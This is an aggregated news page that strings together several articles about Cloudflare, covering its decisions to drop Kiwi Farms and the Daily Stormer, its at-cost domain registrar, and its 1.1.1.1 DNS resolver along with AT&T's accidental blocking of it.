CEO Matthew Prince announced the company’s decision on Saturday after it initially resisted calls to stop protecting the website.

“As Kiwi Farms has felt more threatened, they have reacted by being more threatening,” Prince told The Washington Post. “We think there is an imminent danger, and the pace at which law enforcement is able to respond to those threats we don’t think is fast enough to keep up.” On the company’s blog, Prince said that Cloudflare saw an increase in targeted threats “unlike we have previously seen from Kiwi Farms or any other customer before.”

Kiwi Farms was founded in 2013 by former 8chan administrator Joshua Moon. In the decade since it went online, at least three suicides have been linked to harassment campaigns that originated on the forum. In recent weeks, Kiwi Farms has gained widespread notoriety across both sides of the US political spectrum. After she was the target of multiple swatting attacks that originated on the website, trans Twitch streamer Clara Sorrenti began a campaign to shut down Kiwi Farms. She used the hashtag DropKiwifarms to urge Cloudflare and other critical internet infrastructure providers to stop serving the website.

“There are countless people suffering because of this website,” Sorrenti told The Post on Saturday, moments after police arrived at her home in the wake of another swatting attempt. “Kiwi Farms isn’t about free speech, it’s about hate speech. The majority of the content on the site is threads used for targeted harassment against political targets.”

Separately, Representative Marjorie Taylor Greene of Georgia called for the forum’s shutdown after a user claiming affiliation with Kiwi Farms sent police to her home. “That website needs to be taken down,” Greene told Newsmax during an interview. “There should be no business or any kind of service where you can target your enemy."

Earlier in the week, it appeared Cloudflare would not take action against Kiwi Farms. The company published a blog post on Wednesday detailing its policies on abusive content. Without directly mentioning the forum, Prince and another executive argued that withholding security services from websites the company and public find reprehensible would ultimately harm oppressed and marginalized voices.

On Saturday, Prince described Cloudflare’s decision to block Kiwi Farms as a “dangerous one that we are not comfortable with.” He told The Post he would have preferred to take action in response to a court order but added it was an easier call than when Cloudflare decided to drop the Daily Stormer and 8chan. As of the writing of this story, Kiwi Farms is still online after moving to DDoS-guard and a Russian domain.

Cloudflare, the content delivery network and website security provider, has increasingly been pushing into businesses that intersect with its core missions. Earlier this year, the company rolled out a new, free DNS service to help Internet users evade censorship (including an encrypted DNS service to evade surveillance of domain address queries). Now, the company has announced a barrage of new services to celebrate its eighth “birthday”—and one of them is an at-cost domain registrar.

While Cloudflare had already been handling domain registration through the company’s Enterprise Registrar service, that service was intended for some of Cloudflare’s high-end customers who wanted extra levels of security for their domain names. The new domain registrar business—called Cloudflare Registrar—will eventually be open to anyone, and it will charge exactly what it costs for Cloudflare to register a domain. As Cloudflare CEO Matthew Prince wrote in a blog post yesterday, “We promise to never charge you anything more than the wholesale price each TLD charges.” That includes the small fee assessed by ICANN for each registration.

Prince said that he was motivated to take the company into the registrar business because of Cloudflare’s own experience with registrars and by the perception that many registrars are in the business mostly to up-sell things that require no additional effort. “All the registrar does is record you as the owner of a particular domain,” Prince said. “That just involves sending some commands to an API. In other words, domain registrars are charging you for being a middle-man and delivering essentially no value to justify their markup.” Charging overhead for that sort of service, Prince said, “seemed as nutty to us as certificate authorities charging to run a bit of math.” (Cloudflare also provides free SSL certificates.)

AT&T has been blocking the new Cloudflare DNS service, but AT&T says the blocking was unintentional and that it will fix the problem soon.

The blocking is affecting AT&T home Internet customers who use an AT&T gateway. Cloudflare unveiled its DNS service on April 1, and users in DSLReports forum threads almost immediately started complaining that they couldn’t access it. One thread began on April 1, within hours of Cloudflare’s announcement.

“I am now unable to reach 1.1.1.1 and 1.0.0.1, which is unfortunate because those are the DNS servers I use,” one user wrote.

Cloudflare makes it harder for ISPs to track your web history https://briefnews.eu/cloudflare-makes-it-harder-for-isps-to-track-your-web-history/ https://briefnews.eu/cloudflare-makes-it-harder-for-isps-to-track-your-web-history/#respond Sun, 01 Apr 2018 19:01:03 +0000 http://briefnews.eu/cloudflare-makes-it-harder-for-isps-to-track-your-web-history/

If you’re privacy-minded, you probably aren’t thrilled that governments seem hell-bent on giving internet providers free rein over your browsing data. Cloudflare just gave you a tool to fight back, however. It launched 1.1.1.1, a free Domain Name System service (the technology that translates IP addresses to web domains) that promises to prevent ISPs from easily tracking your web history. Point your DNS setting to the namesake address and it’ll not only prevent your ISP from easily monitoring your site visits (by watching the DNS queries your devices make), but just about anyone else.

Cloudflare has promised to avoid writing any querying addresses to disk and wipe logs within 24 hours. It even went so far as to have KPMG audit its code and practices on a yearly basis to publicly confirm that it’s doing what it promised.

The service could speed up your internet access, too. Cloudflare has claimed that its DNS resolution is much faster than your typical internet internet provider or even rival DNS offerings, with an average of 14ms worldwide versus more than 20ms for OpenDNS and over 30ms for Google. While this won’t lead to a night and day performance difference, it could make the internet feel more responsive than you’ve experienced in the past.

This doesn’t guarantee that your info is completely secure, since DNS by its nature isn’t encrypted (your ISP can still scoop up your web history if it’s determined). And it’s no secret that this serves as an ad for Cloudflare’s performance and security services. If you’re sufficiently tech-savvy to change your DNS settings, you might bring up Cloudflare the next time your employer wants to give its website a boost. Sites will see the greatest speed upgrade when they’re also Cloudflare customers, to no one’s surprise. Nonetheless, it’s good to have an additional tool in your privacy arsenal beyond browsers and VPNs.

Cloudflare launches consumer DNS service to speed up the internet https://briefnews.eu/cloudflare-launches-consumer-dns-service-to-speed-up-the-internet/ https://briefnews.eu/cloudflare-launches-consumer-dns-service-to-speed-up-the-internet/#respond Sun, 01 Apr 2018 13:45:07 +0000 http://briefnews.eu/cloudflare-launches-consumer-dns-service-to-speed-up-the-internet/

Cloudflare today announced its first consumer service product, which is aimed at making web browsing more private. The company launched a new public Domain Name System (DNS) resolver service that’s supposed to protect users from spying while speeding up their experience on the web. And no, it’s not an April Fools’ joke.

DNS resolver services provide computers with the IP addresses they need to access servers based on their URLs. In other words, it’s what transforms venturebeat.com into the information necessary to show you this web page.

These resolvers also hold a great deal of power when it comes to user safety and privacy. Because DNS is essentially the roadmap for connecting computers with servers, it’s possible to know a great deal about someone’s online behavior based on the queries they send through DNS. That’s one of the reasons Cloudflare opted to work on this service, according to cofounder and CEO Matthew Prince.

The company has seen governments use the DNS infrastructure as a means of censoring internet traffic, and this new service should help guard against that. Also, Cloudflare supports DNS over HTTPS, an approach to serving these queries that should make them more secure but requires more buy-in before it can take off.

So what’s in it for Cloudflare? After all, they aren’t operating a charity. This new service will allow Cloudfare to further speed up customers’ websites. The idea came to the company when it was looking into how to get customers’ sites to respond faster.

“And we came to the conclusion that the only way is if we ran not just the authoritative DNS service, which is the part that serves the content producers, but if we ran a consumer DNS service,” Prince said. “And while [that consumer service is] fast if you’re going to someone who is not a Cloudflare customer — it’s the fastest in the world — if you’re going to a Cloudflare customer, it is blindingly fast.”

On the privacy side, Prince said that the company will be erasing all of the logs for the service and won’t be keeping any of the IP addresses from people accessing the service.

“We’re committing to, and actually having a third party come in and audit the fact that we’re destroying all of the logs within 24 hours, we’re never writing any of the source IP addresses to disk, and that’s the only personal identifiable information that would be there,” Prince said.

People interested in giving the service a try can punch 1.1.1.1 into their web browsers, which will provide them with device-specific instructions about how to set up the DNS service.

Until recently, CloudFlare prided itself on its unwavering commitment to free speech. Even when he was criticized for providing service to alleged terrorist groups in 2013, CEO Matthew Prince stood firm, insisting that “a website is speech. It is not a bomb.”

So a lot of people were surprised on Wednesday when the company abruptly changed its tune and canceled the account of the neo-Nazi site Daily Stormer. The action seemed to fly in the face of everything CloudFlare claimed to believe as recently as May.

And in an internal company email obtained by Gizmodo, Prince acknowledged that the decision was exactly as arbitrary as it seemed.

Cloudflare CEO: Hackers pushed The Daily Stormer offline as soon as Cloudflare stopped protecting it https://briefnews.eu/cloudflare-ceo-hackers-pushed-the-daily-stormer-offline-as-soon-as-cloudflare-stopped-protecting-it/ https://briefnews.eu/cloudflare-ceo-hackers-pushed-the-daily-stormer-offline-as-soon-as-cloudflare-stopped-protecting-it/#respond Thu, 17 Aug 2017 00:44:03 +0000 http://briefnews.eu/cloudflare-ceo-hackers-pushed-the-daily-stormer-offline-as-soon-as-cloudflare-stopped-protecting-it/ CloudFlareThe CEO of Cloudflare said he is “deeply uncomfortable” with his own decision to have his company stop protecting The Daily Stormer, a neo-Nazi website.
He decided to stop working with The Daily Stormer after its team suggested that Cloudflare sympathized with its Nazi ideology.
The Daily Stormer’s site was taken down by attackers as soon as Cloudflare stopped protecting it.

Until today, Cloudflare had never dropped a customer due to political pressure.

It’s this fact that company CEO Matthew Prince said makes him so “deeply uncomfortable” with his decision early Wednesday to stop providing paid services to The Daily Stormer, including protecting its website from attackers.

As it turns out, attackers took down the neo-Nazi site as soon as Cloudflare stopped protecting it, Prince told Business Insider. Daily Stormer remained offline on Wednesday evening.

Daily Stormer drew national scrutiny and condemnation after it published a story that demeaned Heather Heyer, the 32-year-old woman who was killed on Saturday when a car rammed into people counter-protesting against a white-supremacist demonstration in Charlottesville, Virginia.

Prince made clear that he found the website’s content “vile.” But he regrets that he alone was able to decide its fate.

“The ability of somebody to single-handedly choose to knock content offline doesn’t align with core ideas of due process or justice,” Prince told Business Insider on Wednesday. “Whether that’s a national government launching attacks or an individual launching attacks.”

How it ended

While Cloudflare may have been Daily Stormer’s last line of defense, Prince’s decision didn’t actually take the company’s site offline by itself. Earlier in the week, GoDaddy and Google both publicly announced they had dropped Daily Stormer as a customer of their domain hosting services.

And then there were the attackers.

The site going offline was an outcome imagined by both friends and foes of the neo-Nazi site. One of the services Cloudflare provides is to provide a sort of buffer between visitors and websites, to protect sites from denial-of-service attacks. It does this in part by obfuscating the identity of the websites’ hosts. It was that service that helped protect Daily Stormer.

“The size and scale of the attacks that can now easily be launched online make it such that if you don’t have a network like Cloudflare in front of your content, and you upset anyone, you will be knocked offline,” Prince wrote in a blog post Wednesday. “In fact, in the case of the Daily Stormer, the initial requests we received to terminate their service came from hackers who literally said: ‘Get out of the way so we can DDoS this site off the Internet.'”

Government pressure

Cloudflare says it handles 10% of all internet requests. So while this is the first time that Cloudflare has stopped working with a website for political reasons, Prince said his company has faced plenty of external and international government pressure.

“There are human rights organizations that are criticizing the Chinese government that we continuously get pressured to restrict,” he said “There are LGBT organizations in the Middle East. Often times it’s things covering abuses by government that governments would rather not have online.”

This is not the first time, though, that Cloudflare has dropped support for a site. It has ended service to other websites in response to illegal activity, such as child pornography. And in 2015, a court ordered Cloudflare to block websites associated with the music streaming service Grooveshark, which was in trouble over copyright violations.

In this case, though, Cloudflare dropped Daily Stormer because the neo-Nazis claimed the company supported their cause.

“The tipping point for us making this decision was that the team behind Daily Stormer made the claim that we were secretly supporters of their ideology,” Prince wrote in the blog.

Prince said that his team is set to have a debate over how to address such issues moving forward.
